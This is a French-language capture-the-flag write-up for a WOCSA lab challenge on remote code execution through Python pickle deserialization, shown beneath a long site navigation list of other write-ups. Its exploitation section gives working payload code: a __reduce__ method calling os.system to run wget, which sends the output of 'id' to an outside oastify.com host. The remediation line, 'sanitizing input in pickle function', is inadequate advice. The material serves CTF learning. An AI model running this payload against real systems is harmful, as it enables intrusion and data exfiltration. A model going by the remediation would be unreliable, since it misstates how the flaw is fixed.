Skip to content

Write UP - Langskip

RCE through Deserialization

Write UP - Langskip

Projet de Side Quest pour l'Ecole 2600
0xL4ughCTF
0xL4ughCTF
- OSINT
  OSINT
- Reverse Engineering
  Reverse Engineering
  - L4ugh CTF 2024 : easylogin
- Crypto
  Crypto
  - RSA GCD
- Web
  Web
  - L4ugh CTF 2024 : Micro
404CTF
404CTF
- Forensic
  Forensic
  - Le tir aux logs
- Pwn
  Pwn
  - Pseudoverflow
- Steganographie
  Steganographie
  - L'absence
- Web
  Web
AmsiCTF
AmsiCTF
- Crypto
  Crypto
  - Destruction
  - Prime suspects
BITskriegCTF
BITskriegCTF
- Pwn
  Pwn
  - MogamBro's Certainty Principle
- Reverse
  Reverse
  - Baby-rev
Bluehens
Bluehens
- Crypto
  Crypto
  - XS6 - CTR mode is just XOR
BraekerCTF
BraekerCTF
- Pwn
  Pwn
  - Embryobot
- Reverse
  Reverse
  - Binary shrink
- Web
  Web
  - Empty-execution
  - Stuffy
BreizhCTF
BreizhCTF
- Web
  Web
  - NginFail
CatTheFlag
CatTheFlag
- Web
  Web
  - Infection Web 1
CryptoHack
CryptoHack
DefCampCTF
DefCampCTF
- Crypto
  Crypto
  - ctr
GlacierCTF
GlacierCTF
- Blockchain
  Blockchain
  - GlacierCTF 2024 - Frozen in time
GreHackCTF
GreHackCTF
- Pwn
  Pwn
  - BabyPwn
HTB
HTB
- Box
  Box
  - Blue
- Crypto
  Crypto
  - Exciting Outpost Recon
- WEB
  WEB
  - Dynamic path
Hackday qualifs
Hackday qualifs
- Crypto
  Crypto
  - Baby Crypto
- Forensic
  Forensic
  - Baby Forensic
  - Blueprint Mirage
- MISC
  MISC
  - The Trap Fish
- Reverse
  Reverse
  - Oh my PAM
Hacktheboo
Hacktheboo
- Crypto
  Crypto
  - Hybrid Unifier
Hackvens
Hackvens
- Forensics
  Forensics
  - Analyse me
HeroCTF
HeroCTF
- Pwn
  Pwn
  - Heappie
- Crypto
  Crypto
  - HeroCTF v6 - Halloween
  - HeroCTF v6 - Interpolation
JerseyCTF
JerseyCTF
- MISC
  MISC
- OSINT
  OSINT
PatriotCTF
PatriotCTF
- Misc
  Misc
  - Let's play hide & seek
  - Making Baking Pancakes
PurplePillCTF
PurplePillCTF
- Crypto
  Crypto
  - Legend
Ringzer0CTF
Ringzer0CTF
- Web
  Web
WOCSA
WOCSA
- Web
  Web
  - CSRF multiple vulnerabilities
  - Django - guessable token
  - IDOR
  - RCE through Deserialization RCE through Deserialization
    Table of contents
    
    Description
    
    Enoncé
    
    Solution détaillée
    
    Exploitation
    
    POC
    
    Risk
    
    Remediation
  - SQL Injection
  - Django - SSTI
  - XSS from Tutorial Title
  - XXE
  - Django debug port active
  - Predictable Reset Token

RCE through Deserialization

Description

Write Up: Guillaume
Créateur: WOCSA
Difficulté: Inconnu

Enoncé

The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid.

Solution détaillée

Exploitation

Create a serialized payload that would be execute through pickle, resulting to a RCE on the server

import pickle
import base64

class PickleRCE(object):
    def __reduce__(self):
        import os
        return (os.system,(command,))

command = 'wget http://r804utwnpnt9ltjax7h1zf20frli98xx.oastify.com/?cmd=$(id|base64 -w10000)' 
payload = base64.b64encode(pickle.dumps(PickleRCE()))
print(payload)

POC

![[Pasted image 20240731141048.png]]

Risk

With an RCE, attacker can do anythings on the service and maybe on the machine itself

Remediation

Sanitizing input in pickle function